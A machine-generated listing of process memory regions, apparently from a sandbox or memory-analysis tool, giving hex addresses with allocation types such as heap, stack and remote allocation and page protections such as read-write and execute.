trusted library allocation
page read and write
4020000
unkown
page readonly
32C3000
heap
page read and write
2BB0000
unkown
page read and write
23C0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
33B1000
trusted library allocation
page read and write
340000
heap
page read and write
222000
direct allocation
page execute and read and write
222000
direct allocation
page execute and read and write
1F0000
trusted library allocation
page read and write
6A3000
heap
page read and write
218000
heap
page read and write
32B8000
heap
page read and write
1F1000
direct allocation
page execute and read and write
7979000
unkown
page read and write
1A0000
trusted library allocation
page read and write
27F0000
unkown
page read and write
2820000
unkown
page read and write
170000
trusted library allocation
page read and write
30E0000
heap
page read and write
18A000
stack
page read and write
32AE000
heap
page read and write
F0000
trusted library allocation
page read and write
2440000
unkown
page read and write
222000
direct allocation
page execute and read and write
1CA000
heap
page read and write
2440000
unkown
page read and write
32AE000
heap
page read and write
1F0000
trusted library allocation
page read and write
6DAC000
unkown
page read and write
2200000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
222000
direct allocation
page execute and read and write
2ACA000
stack
page read and write
27F0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
2720000
unkown
page read and write
34ED000
heap
page read and write
222000
direct allocation
page execute and read and write
1F0000
trusted library allocation
page read and write
222000
direct allocation
page execute and read and write
68E000
heap
page read and write
1B83000
heap
page read and write
232F000
stack
page read and write
2BB0000
unkown
page read and write
2440000
unkown
page read and write
5DEF000
stack
page read and write
26F0000
unkown
page read and write
6A000
system
page execute and read and write
10000
heap
page read and write
2114000
heap
page read and write
2A40000
unkown
page readonly
179000
stack
page read and write
F0000
trusted library allocation
page read and write
26E0000
unkown
page read and write
70000
trusted library allocation
page read and write
26F0000
unkown
page read and write
222000
direct allocation
page execute and read and write
204E000
stack
page read and write
3299000
heap
page read and write
3D0000
heap
page read and write
10000
heap
page read and write
26F0000
unkown
page read and write
107000
heap
page read and write
26F0000
unkown
page read and write
2BB0000
unkown
page read and write
25E0000
unkown
page read and write
5E04000
heap
page read and write
2670000
heap
page read and write
1A0000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
6F73000
heap
page read and write
26E0000
unkown
page read and write
26F0000
unkown
page read and write
70000
trusted library allocation
page read and write
F0000
trusted library allocation
page read and write
26E0000
unkown
page read and write
1DBF000
stack
page read and write
270000
trusted library allocation
page read and write
26F0000
unkown
page read and write
23B0000
unkown
page read and write
2A0000
heap
page read and write
664000
heap
page read and write
2BB0000
unkown
page read and write
464000
heap
page read and write
4A1B000
heap
page read and write
699000
heap
page read and write
10000
heap
page read and write
F0000
trusted library allocation
page read and write
300000
unkown
page read and write
80E000
trusted library allocation
page read and write
2BB0000
unkown
page read and write
500000
heap
page read and write
222000
direct allocation
page execute and read and write
2BBE000
stack
page read and write
2440000
unkown
page read and write
4EEC000
heap
page read and write
7960000
unkown
page read and write
26E0000
unkown
page read and write
32B6000
heap
page read and write
33B000
heap
page read and write
270000
trusted library allocation
page read and write
B4E000
stack
page read and write
2440000
unkown
page read and write
2E11000
heap
page read and write
270000
trusted library allocation
page read and write
3569000
trusted library allocation
page read and write
454E000
stack
page read and write
32B8000
heap
page read and write
E0000
unkown
page read and write
3ECC000
trusted library allocation
page read and write
20000
heap
page read and write
26E0000
unkown
page read and write
1B20000
trusted library allocation
page read and write
32C3000
heap
page read and write
150000
heap
page read and write
2440000
unkown
page read and write
2440000
unkown
page read and write
1A0000
unkown
page readonly
3299000
heap
page read and write
460000
heap
page execute and read and write
21CE000
stack
page read and write
32AE000
heap
page read and write
13C000
stack
page read and write
26E0000
unkown
page read and write
222000
direct allocation
page execute and read and write
3569000
heap
page read and write
26F0000
unkown
page read and write
3517000
heap
page read and write
43C0000
trusted library allocation
page read and write
1A0000
trusted library allocation
page read and write
2DD000
heap
page read and write
F0000
trusted library allocation
page read and write
41A0000
heap
page read and write
2E18000
heap
page read and write
420F000
stack
page read and write
4A1C000
heap
page read and write
270000
trusted library allocation
page read and write
170000
stack
page read and write
2D95000
heap
page read and write
260A000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
26E0000
unkown
page read and write
5E0000
heap
page read and write
647000
heap
page read and write
1F0000
trusted library allocation
page read and write
32B8000
heap
page read and write
21F0000
heap
page read and write
32B6000
heap
page read and write
32B1000
heap
page read and write
2BB0000
unkown
page read and write
2607000
unkown
page read and write
32AE000
heap
page read and write
4B2000
heap
page read and write
3E6000
heap
page read and write
1F1000
direct allocation
page execute and read and write
2E9000
heap
page read and write
20A0000
heap
page read and write
2440000
unkown
page read and write
4BAA000
heap
page read and write
2C0000
heap
page read and write
89B000
heap
page read and write
970000
trusted library allocation
page read and write
2820000
unkown
page read and write
C1000
system
page execute and read and write
2FE000
heap
page read and write
222000
direct allocation
page execute and read and write
2968000
stack
page read and write
270000
trusted library allocation
page read and write
1D7000
trusted library allocation
page execute and read and write
26E0000
unkown
page read and write
3734000
heap
page read and write
4030000
heap
page read and write
32B6000
heap
page read and write
1A0000
trusted library allocation
page read and write
32B6000
heap
page read and write
797B000
unkown
page read and write
1A0000
trusted library allocation
page read and write
26F0000
unkown
page read and write
3C2000
trusted library allocation
page read and write
89B000
heap
page read and write
698000
heap
page read and write
1B40000
unkown
page read and write
682F000
stack
page read and write
1A0000
unkown
page readonly
2D70000
unkown
page read and write
6B99000
heap
page read and write
2440000
unkown
page read and write
1F6000
heap
page read and write
44FE000
stack
page read and write
2AF1000
unkown
page read and write
3C90000
unkown
page readonly
4040000
unkown
page readonly
176000
heap
page read and write
3D17000
unkown
page read and write
28FE000
trusted library allocation
page read and write
F0E000
stack
page read and write
1E20000
heap
page read and write
1F1000
direct allocation
page execute and read and write
222000
direct allocation
page execute and read and write
68CC000
stack
page read and write
32C3000
heap
page read and write
26E0000
unkown
page read and write
1A0000
trusted library allocation
page read and write
1BE000
heap
page read and write
1F1000
direct allocation
page execute and read and write
26E0000
unkown
page read and write
26F0000
unkown
page read and write
362F000
stack
page read and write
1A0000
trusted library allocation
page read and write
5DC2000
heap
page read and write
3210000
heap
page read and write
69F0000
heap
page read and write
5C0000
heap
page read and write
2CD0000
unkown
page read and write
2968000
stack
page read and write
2BB0000
unkown
page read and write
4F38000
heap
page read and write
3BC0000
unkown
page read and write
222000
direct allocation
page execute and read and write
2C3E000
stack
page read and write
3AA1000
unkown
page read and write
26E0000
unkown
page read and write
242F000
stack
page read and write
10000
heap
page read and write
6C90000
heap
page read and write
1F0000
heap
page read and write
1CF5000
heap
page read and write
2440000
unkown
page read and write
2BB0000
unkown
page read and write
2593000
trusted library allocation
page read and write
2440000
unkown
page read and write
2440000
unkown
page read and write
2BB0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
27F0000
unkown
page read and write
1A0000
trusted library allocation
page read and write
1A0000
trusted library allocation
page read and write
46A000
heap
page read and write
39A0000
unkown
page read and write
694000
heap
page read and write
1B7000
heap
page read and write
26E0000
unkown
page read and write
289D000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
32B6000
heap
page read and write
3505000
heap
page read and write
16B000
stack
page read and write
32B1000
heap
page read and write
3760000
unkown
page read and write
33C000
unkown
page read and write
2F9000
heap
page read and write
222000
direct allocation
page execute and read and write
2BB0000
unkown
page read and write
26E0000
unkown
page read and write
693000
heap
page read and write
2BB0000
unkown
page read and write
170000
trusted library allocation
page read and write
2440000
unkown
page read and write
7960000
unkown
page read and write
2820000
unkown
page read and write
4E9F000
stack
page read and write
23CB000
unkown
page read and write
4800000
trusted library allocation
page read and write
10000
heap
page read and write
604000
heap
page read and write
222000
direct allocation
page execute and read and write
3680000
heap
page read and write
ACE000
stack
page read and write
693000
heap
page read and write
2BB0000
unkown
page read and write
5095000
heap
page read and write
2B0000
unkown
page read and write
472E000
stack
page read and write
2BB0000
unkown
page read and write
88000
system
page execute and read and write
32B8000
heap
page read and write
2BB0000
unkown
page read and write
2E14000
heap
page read and write
8303000
unkown
page read and write
26E0000
unkown
page read and write
216000
heap
page read and write
1F1000
direct allocation
page execute and read and write
2440000
unkown
page read and write
4658000
unkown
page read and write
69F0000
heap
page read and write
26E0000
unkown
page read and write
32B1000
heap
page read and write
2BB0000
unkown
page read and write
3604000
trusted library allocation
page read and write
57B000
heap
page read and write
2440000
unkown
page read and write
6C1000
heap
page read and write
38B0000
unkown
page read and write
26E0000
unkown
page read and write
4F7000
heap
page read and write
1F1000
direct allocation
page execute and read and write
3A0000
heap
page read and write
1F1000
direct allocation
page execute and read and write
2DC9000
heap
page read and write
1F1000
direct allocation
page execute and read and write
234E000
unkown
page read and write
2BB0000
unkown
page read and write
3BF0000
unkown
page read and write
2EF000
heap
page read and write
5134000
heap
page read and write
2BB0000
unkown
page read and write
26E0000
unkown
page read and write
F0000
trusted library allocation
page read and write
4200000
unkown
page read and write
2132000
heap
page read and write
4B3E000
stack
page read and write
1F1000
direct allocation
page execute and read and write
2AE0000
unkown
page read and write
32B8000
heap
page read and write
2BB0000
unkown
page read and write
26E0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
170000
trusted library allocation
page read and write
4BB9000
heap
page read and write
32B8000
heap
page read and write
1D60000
heap
page read and write
170000
stack
page read and write
2BB0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
70000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
222000
direct allocation
page execute and read and write
222000
direct allocation
page execute and read and write
2260000
heap
page execute and read and write
3EF5000
unkown
page read and write
32AE000
heap
page read and write
351E000
heap
page read and write
73C0000
heap
page read and write
1F0000
trusted library allocation
page read and write
222000
direct allocation
page execute and read and write
1F0000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
430000
heap
page read and write
70000
trusted library allocation
page read and write
1B0000
heap
page read and write
270000
heap
page read and write
32C3000
heap
page read and write
3512000
heap
page read and write
2D90000
heap
page read and write
1F1000
direct allocation
page execute and read and write
3AB0000
unkown
page read and write
28E000
heap
page read and write
2B00000
unkown
page readonly
790000
trusted library allocation
page read and write
26E0000
unkown
page read and write
220000
trusted library allocation
page execute and read and write
2C0000
heap
page read and write
1B7000
heap
page read and write
1B30000
unkown
page readonly
2F4000
heap
page read and write
1F0000
trusted library allocation
page read and write
32C0000
heap
page read and write
74C0000
unkown
page read and write
693000
heap
page read and write
32B1000
heap
page read and write
3299000
heap
page read and write
28B0000
unkown
page read and write
3409000
trusted library allocation
page read and write
26E0000
unkown
page read and write
3A5000
heap
page read and write
2A5000
heap
page read and write
4DBE000
stack
page read and write | page guard
F90000
unkown
page readonly
28B0000
unkown
page read and write
301D000
stack
page read and write
8AD000
stack
page read and write
26E0000
unkown
page read and write
45AB000
stack
page read and write
2F4000
heap
page read and write
EC000
system
page execute and read and write
2440000
unkown
page read and write
7DE000
stack
page read and write
222000
direct allocation
page execute and read and write
32C3000
heap
page read and write
26F0000
unkown
page read and write
10C000
stack
page read and write
1F1000
direct allocation
page execute and read and write
2440000
unkown
page read and write
2440000
unkown
page read and write
26E0000
unkown
page read and write
540000
remote allocation
page read and write
44B0000
trusted library allocation
page execute and read and write
3B10000
unkown
page read and write
3A4E000
stack
page read and write
260A000
unkown
page read and write
10000
heap
page read and write
2BB0000
unkown
page read and write
321000
heap
page read and write
8AA000
heap
page read and write
270000
trusted library allocation
page read and write
222000
direct allocation
page execute and read and write
2BB0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
F0000
trusted library allocation
page read and write
1E0000
heap
page read and write
4E0D000
stack
page read and write
2440000
unkown
page read and write
2BB0000
unkown
page read and write
698000
heap
page read and write
5E08000
stack
page read and write
490000
heap
page read and write
4ED000
stack
page read and write
4D9D000
stack
page read and write
320000
trusted library allocation
page read and write
2BB0000
unkown
page read and write
24DD000
stack
page read and write
3605000
trusted library allocation
page read and write
F92000
unkown
page execute read
2440000
unkown
page read and write
26E0000
unkown
page read and write
3299000
heap
page read and write
F9E000
unkown
page readonly
1D9B000
heap
page read and write
59F000
heap
page read and write
356E000
heap
page read and write
1F0000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
32C3000
heap
page read and write
1F1000
direct allocation
page execute and read and write
2ACA000
stack
page read and write
2BB0000
unkown
page read and write
8303000
unkown
page read and write
26D2000
unkown
page read and write
3A9000
heap
page read and write
30E000
stack
page read and write
4A12000
heap
page read and write
3D10000
unkown
page read and write
2BB0000
unkown
page read and write
2C90000
unkown
page readonly
36A000
stack
page read and write
2CF0000
heap
page read and write
2BB0000
unkown
page read and write
32B6000
heap
page read and write
2BB0000
unkown
page read and write
2BB0000
unkown
page read and write
3F70000
unkown
page execute read
31E000
unkown
page read and write
72D1000
trusted library allocation
page read and write
2440000
unkown
page read and write
222000
direct allocation
page execute and read and write
32C3000
heap
page read and write
2BB0000
unkown
page read and write
BD000
stack
page read and write
472E000
stack
page read and write
2430000
unkown
page read and write
3C0000
heap
page read and write
2440000
unkown
page read and write
222000
direct allocation
page execute and read and write
1F0000
trusted library allocation
page read and write
3EEE000
unkown
page read and write
26E0000
unkown
page read and write
26E0000
unkown
page read and write
44A0000
trusted library allocation
page read and write
1A0000
trusted library allocation
page read and write
260D000
unkown
page read and write
6DE000
heap
page read and write
2440000
unkown
page read and write
2440000
unkown
page read and write
2F4000
heap
page read and write
6B7E000
stack
page read and write
10000
heap
page read and write
1A7000
heap
page read and write
2BB0000
unkown
page read and write
307000
heap
page read and write
1A0000
trusted library allocation
page read and write
1DAD000
stack
page read and write
3C60000
unkown
page readonly
350E000
heap
page read and write
A30000
trusted library allocation
page read and write
E7000
system
page execute and read and write
1F0000
trusted library allocation
page read and write
6A6000
heap
page read and write
2BF000
stack
page read and write
222000
direct allocation
page execute and read and write
26E0000
unkown
page read and write
1F0000
trusted library allocation
page read and write
2E07000
heap
page read and write
2BB0000
unkown
page read and write
F90000
unkown
page readonly
68B000
heap
page read and write
A80000
trusted library allocation
page read and write
938000
heap
page read and write
222000
direct allocation
page execute and read and write
27F0000
unkown
page read and write
1CFA000
unkown
page read and write
32C3000
heap
page read and write
32B6000
heap
page read and write
27A0000
heap
page read and write
26F0000
unkown
page read and write
222000
direct allocation
page execute and read and write
36A000
heap
page read and write
4AEC000
heap
page read and write
38B000
heap
page read and write
26E0000
unkown
page read and write
1F0000
trusted library allocation
page read and write
F0000
trusted library allocation
page read and write
438E000
stack
page read and write
32B8000
heap
page read and write
1F0000
trusted library allocation
page read and write
26E0000
unkown
page read and write
2BB0000
unkown
page read and write
3B10000
unkown
page read and write
27A4000
heap
page read and write
4F0000
trusted library allocation
page read and write
1D0000
trusted library allocation
page read and write
370D000
heap
page read and write
1E30000
direct allocation
page read and write
2D0000
trusted library allocation
page execute and read and write
400000
unkown
page readonly
7440000
heap
page read and write
3CD0000
unkown
page readonly
801000
trusted library allocation
page read and write
3850000
heap
page read and write
270000
trusted library allocation
page read and write
391000
heap
page read and write
3CC0000
unkown
page read and write
630000
direct allocation
page execute and read and write
55D000
heap
page read and write
2BB0000
unkown
page read and write
4F0000
heap
page read and write
2A0000
heap
page read and write
3C60000
unkown
page readonly
1F1000
direct allocation
page execute and read and write
F0000
trusted library allocation
page read and write
32B1000
heap
page read and write
2CE000
heap
page read and write
8182000
unkown
page read and write
4CFE000
stack
page read and write
5ED000
heap
page read and write
32C3000
heap
page read and write
26F0000
unkown
page read and write
400000
remote allocation
page execute and read and write
260D000
unkown
page read and write
88C000
heap
page read and write
6D0000
heap
page read and write
4A0000
trusted library allocation
page read and write
32B8000
heap
page read and write
22F0000
heap
page read and write
6F55000
heap
page read and write
27D000
stack
page read and write
BAF000
stack
page read and write
457E000
stack
page read and write
8340000
unkown
page read and write
4B1D000
heap
page read and write
1F1000
direct allocation
page execute and read and write
2440000
unkown
page read and write
F0000
trusted library allocation
page read and write
3D38000
unkown
page read and write
49C0000
heap
page read and write
43A0000
trusted library allocation
page read and write
3CD0000
unkown
page readonly
2BB0000
unkown
page read and write
1F0000
trusted library allocation
page read and write
7D4000
heap
page read and write
382000
trusted library allocation
page read and write
26E0000
unkown
page read and write
3299000
heap
page read and write
3A7000
heap
page read and write
2820000
unkown
page read and write
73C5000
heap
page read and write
6760000
stack
page read and write
1A0000
trusted library allocation
page read and write
32B1000
heap
page read and write
2440000
unkown
page read and write
4260000
trusted library allocation
page read and write
32C3000
heap
page read and write
1BC000
stack
page read and write
214F000
stack
page read and write
1BE000
heap
page read and write
26E0000
unkown
page read and write
2440000
unkown
page read and write
210000
heap
page read and write
2440000
unkown
page read and write
43E0000
trusted library allocation
page read and write
32AE000
heap
page read and write
2440000
unkown
page read and write
23D0000
unkown
page read and write
F0000
trusted library allocation
page read and write
3299000
heap
page read and write
2C4000
heap
page read and write
3A60000
unkown
page readonly
1F0000
trusted library allocation
page read and write
26B000
heap
page read and write
1F1000
direct allocation
page execute and read and write
26E0000
unkown
page read and write
2177000
stack
page read and write
28B0000
unkown
page read and write
3390000
heap
page read and write
3C80000
unkown
page read and write
AB0000
heap
page read and write
AA0000
trusted library allocation
page execute and read and write
492B000
stack
page read and write
489F000
stack
page read and write
27FE000
trusted library allocation
page read and write
1CD2000
unkown
page read and write
2BB0000
unkown
page read and write
9BE000
stack
page read and write
4260000
trusted library allocation
page read and write
7970000
unkown
page read and write
222000
direct allocation
page execute and read and write
26E0000
unkown
page read and write
222000
direct allocation
page execute and read and write
3C50000
unkown
page readonly
170000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
1CD0000
heap
page read and write
26E0000
unkown
page read and write
222000
direct allocation
page execute and read and write
170000
trusted library allocation
page read and write
24A1000
unkown
page read and write
89C000
heap
page read and write
32B1000
heap
page read and write
26E0000
unkown
page read and write
2210000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
31CE000
stack
page read and write
20000
heap
page read and write
4D3F000
stack
page read and write
1F0000
trusted library allocation
page read and write
1A0000
trusted library allocation
page read and write
280000
trusted library allocation
page read and write
3AD0000
unkown
page read and write
32B1000
heap
page read and write
49CD000
stack
page read and write
330000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
366E000
stack
page read and write
8284000
unkown
page read and write
26E0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
1CF0000
heap
page read and write
2D8E000
heap
page read and write
26E0000
unkown
page read and write
1A0000
trusted library allocation
page read and write
1F1F000
stack
page read and write
1F0000
trusted library allocation
page read and write
26E0000
unkown
page read and write
26E0000
unkown
page read and write
693000
heap
page read and write
F0000
trusted library allocation
page read and write
66000
system
page execute and read and write
2BB0000
unkown
page read and write
5BF000
heap
page read and write
270000
trusted library allocation
page read and write
480000
heap
page read and write
5EBE000
stack
page read and write
64F0000
heap
page read and write
6910000
heap
page read and write
1F1000
direct allocation
page execute and read and write
70000
trusted library allocation
page read and write
2BB0000
unkown
page read and write
2D80000
heap
page read and write
32AE000
heap
page read and write
26E0000
unkown
page read and write
2BB0000
unkown
page read and write
F0000
trusted library allocation
page read and write
2440000
unkown
page read and write
26F0000
unkown
page read and write
32AE000
heap
page read and write
1BE0000
unkown
page readonly
26E0000
unkown
page read and write
28DD000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
2440000
unkown
page read and write
170000
trusted library allocation
page read and write
1B30000
unkown
page readonly
1F1000
direct allocation
page execute and read and write
3F0000
heap
page read and write
2440000
unkown
page read and write
1D60000
heap
page read and write
2BB0000
unkown
page read and write
1F0000
trusted library allocation
page read and write
676B000
stack
page read and write
20BC000
stack
page read and write
26E0000
unkown
page read and write
250B000
trusted library allocation
page read and write
7948000
unkown
page read and write
8200000
unkown
page read and write
7ED000
heap
page read and write
170000
trusted library allocation
page read and write
4630000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
293A000
trusted library allocation
page read and write
32B8000
heap
page read and write
270000
trusted library allocation
page read and write
692000
heap
page read and write
697000
heap
page read and write
4260000
trusted library allocation
page read and write
34EA000
heap
page read and write
7170000
heap
page read and write
1A0000
trusted library allocation
page read and write
2440000
unkown
page read and write
1D30000
unkown
page readonly
4390000
trusted library allocation
page read and write
6910000
heap
page read and write
23E0000
unkown
page readonly
68B000
heap
page read and write
222000
direct allocation
page execute and read and write
1CD2000
unkown
page read and write
436000
heap
page read and write
580000
unkown
page readonly
31E000
heap
page read and write
85F2000
unkown
page read and write
385000
trusted library allocation
page execute and read and write
1A0000
trusted library allocation
page read and write
3ED0000
unkown
page read and write
2440000
unkown
page read and write
170000
trusted library allocation
page read and write
170000
trusted library allocation
page read and write
26E0000
unkown
page read and write
222000
direct allocation
page execute and read and write
415E000
stack
page read and write
22E4000
trusted library allocation
page read and write
6B7E000
stack
page read and write
32AC000
heap
page read and write
270000
trusted library allocation
page read and write
70000
trusted library allocation
page read and write
284B000
unkown
page read and write
6A13000
heap
page read and write
270000
trusted library allocation
page read and write
32B6000
heap
page read and write
8383000
unkown
page read and write
2BB0000
unkown
page read and write
32B1000
heap
page read and write
1A4000
trusted library allocation
page read and write
4490000
trusted library allocation
page read and write
3BB0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
1A0000
trusted library allocation
page read and write
3FD000
stack
page read and write
24FF000
trusted library allocation
page read and write
1A0000
trusted library allocation
page read and write
4F42000
heap
page read and write
2BB0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
21CC000
stack
page read and write
222000
direct allocation
page execute and read and write
2110000
heap
page read and write
F0000
trusted library allocation
page read and write
4BB9000
heap
page read and write
C9F000
stack
page read and write
170000
trusted library allocation
page read and write
F0000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
4260000
trusted library allocation
page read and write
26E0000
unkown
page read and write
615E000
stack
page read and write
28DA000
trusted library allocation
page read and write
222000
direct allocation
page execute and read and write
1F1000
direct allocation
page execute and read and write
220000
heap
page read and write
270000
trusted library allocation
page read and write
26E0000
unkown
page read and write
3299000
heap
page read and write
8200000
unkown
page read and write
E0000
heap
page read and write
1F0000
trusted library allocation
page read and write
32AE000
heap
page read and write
909000
trusted library allocation
page read and write
8240000
unkown
page read and write
4DA0000
heap
page read and write
26E0000
unkown
page read and write
6C1000
heap
page read and write
2440000
unkown
page read and write
2CC000
heap
page read and write
1F1000
direct allocation
page execute and read and write
24E0000
unkown
page read and write
3601000
heap
page read and write
486000
heap
page read and write
F0000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
28FF000
stack
page read and write
4260000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
2EA000
heap
page read and write
26F0000
unkown
page read and write
3299000
heap
page read and write
2440000
unkown
page read and write
2CF0000
heap
page read and write
2BB0000
unkown
page read and write
27FF000
stack
page read and write
1F1000
direct allocation
page execute and read and write
170000
trusted library allocation
page read and write
3A80000
unkown
page execute and read and write
1CFF000
stack
page read and write
39A0000
unkown
page read and write
570000
heap
page read and write
26E0000
unkown
page read and write
4480000
trusted library allocation
page read and write
1FA000
stack
page read and write
288B000
trusted library allocation
page read and write
825000
heap
page read and write
1A0000
trusted library allocation
page read and write
1D64000
heap
page read and write
27EF000
stack
page read and write
270000
trusted library allocation
page read and write
3D2D000
stack
page read and write
5B0000
heap
page read and write
3FDC000
stack
page read and write
36F0000
heap
page read and write
5D30000
unkown
page read and write
4B9E000
heap
page read and write
1F1000
direct allocation
page execute and read and write
3D6000
heap
page read and write
2BB0000
unkown
page read and write
2BB0000
unkown
page read and write
2BB0000
unkown
page read and write
5DAE000
stack
page read and write
270000
trusted library allocation
page read and write
5C7E000
stack
page read and write
2BB0000
unkown
page read and write
26E0000
unkown
page read and write
222000
direct allocation
page execute and read and write
270000
trusted library allocation
page read and write
A20000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
3F05000
unkown
page read and write
21FE000
stack
page read and write
26F0000
unkown
page read and write
222000
direct allocation
page execute and read and write
5090000
heap
page read and write
270000
trusted library allocation
page read and write
62B0000
heap
page read and write
1F1000
direct allocation
page execute and read and write
32B6000
heap
page read and write
1F1000
direct allocation
page execute and read and write
5DA0000
heap
page read and write
3945000
stack
page read and write
2440000
unkown
page read and write
39C0000
unkown
page read and write
222000
direct allocation
page execute and read and write
3F0000
heap
page read and write
1E20000
heap
page read and write
1F0000
trusted library allocation
page read and write
26E0000
unkown
page read and write
3602000
trusted library allocation
page read and write
6F50000
heap
page read and write
25E0000
unkown
page read and write
1C00000
unclassified section
page read and write
270000
trusted library allocation
page read and write
1A0000
trusted library allocation
page read and write
2BC8000
heap
page read and write
23BB000
unkown
page read and write
259A000
trusted library allocation
page read and write
20C000
stack
page read and write
4260000
trusted library allocation
page read and write
26F0000
unkown
page read and write
1F0000
trusted library allocation
page read and write
1D10000
unkown
page readonly
1B65000
heap
page read and write
3489000
heap
page read and write
68B000
heap
page read and write
2F4000
heap
page read and write
2490000
heap
page read and write
693000
heap
page read and write
3E09000
trusted library allocation
page read and write
222000
direct allocation
page execute and read and write
1A0000
trusted library allocation
page read and write
1E4000
trusted library allocation
page read and write
2440000
unkown
page read and write
4260000
trusted library allocation
page read and write
2CB0000
unkown
page readonly
1F0000
trusted library allocation
page read and write
3DB1000
unkown
page read and write
4E6000
heap
page read and write
2440000
unkown
page read and write
2420000
unkown
page read and write
4950000
trusted library allocation
page execute and read and write
52AD000
stack
page read and write
366000
stack
page read and write
F0000
trusted library allocation
page read and write
2BB0000
unkown
page read and write
1BA000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
1F1000
direct allocation
page execute and read and write
484000
heap
page read and write
26E0000
unkown
page read and write
43B0000
trusted library allocation
page read and write
23CB000
unkown
page read and write
26E0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
2A7000
trusted library allocation
page execute and read and write
1F1000
direct allocation
page execute and read and write
3EF5000
unkown
page read and write
26E0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
2BCB000
heap
page read and write
1F1000
direct allocation
page execute and read and write
26E0000
unkown
page read and write
320E000
stack
page read and write
32B1000
heap
page read and write
2F1000
heap
page read and write
61000
system
page execute and read and write
930000
heap
page read and write
F0000
trusted library allocation
page read and write
690000
heap
page read and write
70000
trusted library allocation
page read and write
BDE000
stack
page read and write
29C6000
trusted library allocation
page read and write
1D2000
trusted library allocation
page read and write
6290000
heap
page read and write
64D0000
heap
page read and write
350C000
heap
page read and write
1D0000
trusted library allocation
page read and write
26E0000
unkown
page read and write
42A0000
trusted library allocation
page read and write
3299000
heap
page read and write
1F1000
direct allocation
page execute and read and write
3C00000
unkown
page read and write
222000
direct allocation
page execute and read and write
2BB0000
unkown
page read and write
3E59000
unkown
page read and write
F0000
trusted library allocation
page read and write
7CD1000
trusted library allocation
page read and write
4C0000
heap
page execute and read and write
4F36000
heap
page read and write
2407000
unkown
page read and write
4020000
unkown
page readonly
81000
system
page execute and read and write
222000
direct allocation
page execute and read and write
6A0000
heap
page read and write
3C90000
unkown
page readonly
A2D1000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
170000
trusted library allocation
page read and write
222000
direct allocation
page execute and read and write
6C1000
heap
page read and write
2FB000
heap
page read and write
2440000
unkown
page read and write
8182000
unkown
page read and write
92D1000
trusted library allocation
page read and write
222000
direct allocation
page execute and read and write
64D0000
heap
page read and write
4260000
trusted library allocation
page read and write
5C4000
heap
page read and write
37B000
heap
page read and write
26E0000
unkown
page read and write
222000
direct allocation
page execute and read and write
7280000
unkown
page read and write
26F0000
unkown
page read and write
69BB000
stack
page read and write
1A0000
trusted library allocation
page read and write
2BC4000
heap
page read and write
7F1000
heap
page read and write
26F0000
unkown
page read and write
322000
heap
page read and write
5E7000
heap
page read and write
81A000
trusted library allocation
page read and write
26E0000
unkown
page read and write
222000
direct allocation
page execute and read and write
3F05000
unkown
page read and write
7A0000
heap
page read and write
293E000
stack
page read and write
2BB0000
unkown
page read and write
3A2F000
stack
page read and write
5F60000
heap
page read and write
F0000
trusted library allocation
page read and write
49AE000
stack
page read and write
1F1000
direct allocation
page execute and read and write
2BB0000
unkown
page read and write
26E0000
unkown
page read and write
B5D000
stack
page read and write
26E0000
unkown
page read and write
2440000
unkown
page read and write
32C3000
heap
page read and write
2A7000
stack
page read and write
7200000
heap
page read and write
26E0000
unkown
page read and write
26E0000
unkown
page read and write
2D5F000
stack
page read and write
26E0000
unkown
page read and write
2440000
unkown
page read and write
26F0000
unkown
page read and write
81D2000
trusted library allocation
page read and write
2440000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
32B6000
heap
page read and write
26F0000
unkown
page read and write
32C3000
heap
page read and write
4638000
unkown
page read and write
70000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
26E0000
unkown
page read and write
1F0000
trusted library allocation
page read and write
2E07000
heap
page read and write
2BB0000
unkown
page read and write
2230000
heap
page read and write
222000
direct allocation
page execute and read and write
1F1000
direct allocation
page execute and read and write
1F0000
trusted library allocation
page read and write
2440000
unkown
page read and write
3A60000
unkown
page readonly
26F0000
unkown
page read and write
4340000
trusted library allocation
page read and write
222000
direct allocation
page execute and read and write
88E000
heap
page read and write
2440000
unkown
page read and write
81000
system
page execute and read and write
2BB0000
unkown
page read and write
222000
direct allocation
page execute and read and write
26F0000
unkown
page read and write
222000
direct allocation
page execute and read and write
3BD0000
unkown
page read and write
70000
trusted library allocation
page read and write
3299000
heap
page read and write
42EF000
stack
page read and write
2541000
trusted library allocation
page read and write
1B0000
heap
page read and write
2440000
unkown
page read and write
3D00000
unkown
page readonly
170000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
2E8000
heap
page read and write
2F0000
heap
page read and write
CD000
trusted library allocation
page execute and read and write
2440000
unkown
page read and write
8199000
unkown
page read and write
280000
heap
page read and write
256E000
stack
page read and write
26F0000
unkown
page read and write
8A5000
heap
page read and write
2730000
heap
page read and write
1F1000
direct allocation
page execute and read and write
6C1000
heap
page read and write
3A50000
unkown
page readonly
3AC0000
unkown
page read and write
69E000
heap
page read and write
4BDD000
stack
page read and write
390000
trusted library allocation
page read and write
222000
direct allocation
